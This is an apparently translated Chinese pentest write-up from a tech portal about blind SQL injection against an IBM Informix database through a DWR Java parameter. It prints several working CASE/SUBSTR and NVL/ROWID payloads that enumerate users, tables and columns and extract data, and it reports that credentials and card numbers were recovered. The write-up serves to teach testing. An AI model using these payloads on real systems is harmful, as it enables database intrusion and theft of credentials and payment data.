51CTO首页
AI.x社区
博客
学堂
精品班
直播训练营
企业培训
鸿蒙开发者社区
WOT技术大会
AIGC创新中国行
公众号矩阵
移动端
短视频免费课程课程排行直播课软考学堂
全部课程厂商认证IT技术2024年软考PMP项目管理软考资讯
在线学习
文章资源问答课堂专栏直播
51CTO
鸿蒙开发者社区
51CTO技术栈
51CTO官微
51CTO学堂
51CTO博客
CTO训练营
鸿蒙开发者社区订阅号
51CTO题库小程序
51CTO学堂APP
51CTO学堂企业版APP
鸿蒙开发者社区视频号
账号设置 退出

Informix数据库SQL注入实战

作者:Rem1x
安全 数据安全
在最近的应用程序渗透测试中,我发现一个有意思的sql漏洞(SQLI中)。本文,笔者来介绍他遇到的问题以及如何解决并dump数据库。

在最近的应用程序渗透测试中,我发现一个有意思的sql漏洞(SQLI中)。

SQLI出现这种情况的原因:

1.开发中带来的问题

2.数据库正在使用

下面,我来介绍我遇到的问题以及如何解决并dump数据库。该应用程序使用一种名为DWR后端的JAVA远程调用框架,系统调用是这样的:

Informix数据库SQL注入实战

这是位于C0-param1的参数,从表面上看起来很容易,因为它给了详细的错误信息,当一个单引号被添加到参数尾部时,会得到以下错误信息:“java.sql.SQLException: A syntax error has occurred.”(语法错误)

Informix数据库SQL注入实战

c0-param1参数控制有多少结果从数据库中检索出来,这注射点出现在类似于mssql的TOP keyword位置和MYSQL的Limit。我认为SQLI跑MSSQL库比MYSQL更合适。我添加一系列请求如下图所示:

Informix数据库SQL注入实战

执行查询后,得到一个错误信息:“java.sql.SQLException: The column (card_no) must be in the GROUP BY list.”数据库系统是IBM的Informix,我对Informix了解甚少,所以还得一个函数一个函数地查IBM的文档。

现在知道这是Informix,能帮助我们对次注射是怎么产生的,第一个子句,类似TOP和LIMIT,查询起来是这样的:

c0-param1=string:10 (CASE WHEN SUBSTR((SELECT USER FROM SYSTABLES WHERE TABID = 1), 1, 1) = 'a' THEN 1 ELSE (SELECT 1 FROM SYSTABLES) END),

如果条件为真(即当前用户名的第一个字母为'a'),查询将返回结果,反则会报错,因为子查询(SELECT 1 FROM SYSTABLES)会返回多个结果。然而,又有难题了,不能使用等号,通过替换,使用以下语句:

c0-param1=string:10 (CASE WHEN SUBSTR((SELECT USER FROM SYSTABLES WHERE TABID > 0 AND TABID < 2), 1, 1) LIKE 'a' THEN 1 ELSE (SELECT 1 FROM SYSTABLES) END),

有了这些注射知识和概念就好整多了,掏出sqlmap(从我的同事那里弄到了些小技巧,而且观摩了他的帖子“Sqlmap的高级注入技巧”),Sqlmap的确是很好的工具,作者是今年在大会上认识的一个很不错的家伙写的。。。好像跑题了。不过遗憾的是,Sqlmap不支持Informix,所以我不得不自己写工具了:

获取表名的长度:

c0-param1=string:10 (CASE WHEN CHAR_LENGTH((SELECT TABNAME FROM SYSTABLES WHERE TABID > 0 AND TABID < 2)) > 1 THEN 1 ELSE (SELECT 1 FROM SYSTABLES) END),

获取表名:

c0-param1=string:10 (CASE WHEN SUBSTR((SELECT TABNAME FROM SYSTABLES WHERE TABID > 0 AND TABID < 2), 1, 1) LIKE 'a' THEN 1 ELSE (SELECT 1 FROM SYSTABLES) END),

获取有表中有多少列:

c0-param1=string:10 (CASE WHEN (SELECT NCOLS FROM SYSTABLES WHERE TABID > 0 AND TABID < 2) > 1 THEN 1 ELSE (SELECT 1 FROM SYSTABLES) END),

获取列名长度:

c0-param1=string:10 (CASE WHEN CHAR_LENGTH((SELECT COLNAME FROM SYSCOLUMNS WHERE (TABID > 0 AND TABID < 2) AND (COLNO > 0 AND COLNO < 2))) > 1 THEN 1 ELSE (SELECT 1 FROM SYSTABLES) END),

获取列名:

c0-param1=string:10 (CASE WHEN SUBSTR((SELECT COLNAME FROM SYSCOLUMNS WHERE (TABID > 0 AND TABID < 2) AND (COLNO > 0 AND COLNO < 2)), 1, 1) LIKE 'a' THEN 1 ELSE (SELECT 1 FROM SYSTABLES) END),

通过一个小研究,我发现Informix的表实际上有一个隐藏很深的列名:ROWID,每一行都存在一个这样的序列号。然而,这些ROWID可以分散,删除或插入到表。为了找到包含数据的ROWID,我调用一个名为NVL的函数,这个函数可以返回不同的结果,具体取决于第一个参数是否为NULL。最终找到一处可能总是包含数据的一列,语句:

c0-param1=string:10 (NVL((SELECT username FROM users WHERE ROWID > 0 AND ROWID < 2), (SELECT 1 FROM SYSTABLES))),

c0-param1=string:10 (CASE WHEN SUBSTR((SELECT username FROM users WHERE ROWID > 0 AND ROWID < 1), 1, 1) LIKE 'a' THEN 1 ELSE (SELECT 1 FROM SYSTABLES) END),

通过这种方法,能够发现纯文本应用程序凭据,明文银行SFTP凭证和未加密的支付卡号码。

随着这一成功,明白了以前对Informix数据库想知道的。

原文地址:http://blog.spiderlabs.com/2013/12/the-case-of-an-obscure-injection.html

责任编辑:蓝雨泪 来源: FreebuF
SQL注入sql漏洞
相关推荐
追查数据库SQL注入30小时
历经30多小时,某电子商务行业用户终于查清了一次数据库SQL注入的始末,并进行了深刻的总结。启明星辰数据库审计专家也给出了专业的点评。

2013-07-25 20:36:02

Oracle数据库的安全,PL/SQLSQL注入
我们今天主要讨论的是Oracle数据库的安全:PLSQL的SQL注入这一技术的实际应用,如果你对其的实际应用,感到“晕”的话。以下的文章会给你提供相关的资料。

2010-04-12 08:59:00

Informix Online数据库日常管理及维护
本文主要介绍了InformixOnline数据库日常管理及维护,其中介绍的内容都比较实用。希望可以给读者带来帮助。

2009-01-07 09:46:18

InformixOnline数据库
详解sql注入通过函数判断数据库类型
某些SQL函数也可判断数据库类型,虽然SQL语句大部分是通用的。但一些内置的函数还是有一定的区别。下面就将为您介绍sql注入通过函数判断数据库类型,供您参考。

2010-09-09 14:31:31

SQL函数数据库
SQL Server 链接 Oracle 数据库实战
本文首先介绍了ORACLE客户端的安装过程,然后介绍了配置Oracle数据库(称为OracleNet)的网络层的方法,最后介绍了链接服务器的测试及查询目标数据库实例的方法。

2022-11-04 08:34:27

Oracle数据库
备份Informix-Online数据库三法
InformixOnline数据库因其具有高性能、高可靠性、支持数据完整性定义检查等特性而得到广泛应用。对于使用中的数据库,数据备份的安全可靠性便成为人们关注的焦点。根据多年的学习和经验,笔者对InformixOnline数据库常用的三种数据备份方式加以归纳和比较。本文所讲备份大多是备份到磁带上的热备份方法。

2017-05-18 12:45:57

Informix-On备份数据库
数据库防脚本注入
下面分享一个使用的防止数据库Sql脚本注入的使用类

2013-04-26 11:39:40

数据库安全之MSSQL数据库注入
MSSQL数据库是大中型Web站点常采用的数据库,对于SQL数据最大的威胁是注入。攻击者通过注入来调用SQL语句执行系统命令,因此其危险性更大。一个注入点,有可能造成整个Web服务器的沦陷。MSSQL数据库防注入可以从下面几个方面入手。

2010-09-30 09:11:01

IBM推出全新Informix数据库管理工具
IBM近日为其数据库管理系统增加了新的数据存储功能,推出了数据库动态服务器InformixDynamicServer。

2009-03-09 09:26:49

Informix数据库管理OLTP
数据库防火墙如何防范SQL注入行为
通过SQL注入可以远程获取并利用应用里的数据,并且获取未经hashed加密的用户秘钥以及信用卡信息,甚至有以管理员身份登陆进这些应用的可能。

2015-09-15 16:29:25

检测在线数据库SQL注入漏洞的利器:HP Scrawlr
您需要是不是正要检测在线数据库的漏洞呢?正好,HP为我们提供了一个免费工具来检测网站是否存在SQL注入漏洞。HPScrawlr能够爬行您的站点,以查找代码中的安全漏洞。这款软件是免费的,并且很容易上手。

2009-10-09 15:20:12

如何使SQL Server 数据库SQL Server 数据库
我们今天主要向大家讲述的是SQLServer数据库正确使用2G以上的内存的实际操作方案,以下就是文章的主要内容的详细介绍。

2010-07-15 17:28:50

SQL Server
实战ASP数据库
ASP数据库既是服务活动页面,可以进行编程,可以说是功能很强大的,掌握了ASP数据库可是用处多多,实战ASP数据库,还等什么。

2011-03-04 10:30:25

ASP数据库
讲解Informix数据库的安全性及安全审计
Informix数据库是IBM公司出品的关系数据库管理系统家族,Informix数据库作为一个集成解决方案,它被定位为作为IBM在线事务处理旗舰级数据服务系统。现在是各大数据库系统都关注着安全问题,当然Informix数据库也不例外,下文就为大家讲解Informix数据库的安全性及安全审计。

2011-03-25 09:46:16

Informix数据库安全性安全审计
正确升级SQL Server数据库系统实战演示
以下的文章主要是介绍正确升级SQLServer数据库系统的实际操作流程,还有对分析阶段与扩大VS减小的相关内容的介绍。

2010-06-30 08:46:51

升级SQL Serve
数据库SQL Server数据库备份方式
完整备份相当于针对整个数据库备份,包含数据库的全部内容。数据库完整备份可以将数据库的所有内容备份为一个.Bak文件。后续可以通过该备份文件在本机或者拷贝到其他服务器上进行数据库还原。

2021-05-17 06:57:34

SQLServer数据库
Informix 11.7 时间序列数据库在智能电表的应用实例
Informix时间序列(InformixTimeSeries)是Informix数据库解决海量数据处理的一项重要技术。该技术采用特殊数据存储方式,极大提高了时间相关数据的处理能力,相对于关系型数据库它的存储空间减半。在智能电表的应用里,用户在一个时间序列列中设定固定时间间隔的数据,并通过使用时间序列函数(TimeSeriesFunction)实现对这些数据的实时查询、更新、删除...

2012-12-10 10:57:04

IBMdW
内存数据库Tair实战
LBS生活服务,主要通过即时的功能来完成。它与RedisGeohash的核心区别是Geohash只能做点对点关系的邻近的查询,譬如它只能搜最近10km的人或者是离我最近的店。

2022-12-07 18:45:22

内存数据库Redis
DB2数据库Informix在那些方面存在异同?
以下的文章主要是介绍DB2数据库和Informix比较,我们主要是从以下的这些内容,即,开放性与可移植性,处理性能,以及并行能力进行说明。

2010-07-30 09:49:05

SQL Server数据库备份和SQL Server数据库的恢复措施
我们今天主要描述SQLServer数据库备份和SQLServer数据库的恢复措,愿在你学习SQLServer数据库备份和SQLServer数据库的恢复措中以起到抛砖引玉的作用。

2010-07-08 11:05:14

SQL Server数
点赞
收藏

51CTO技术栈公众号

业务
速览
在线客服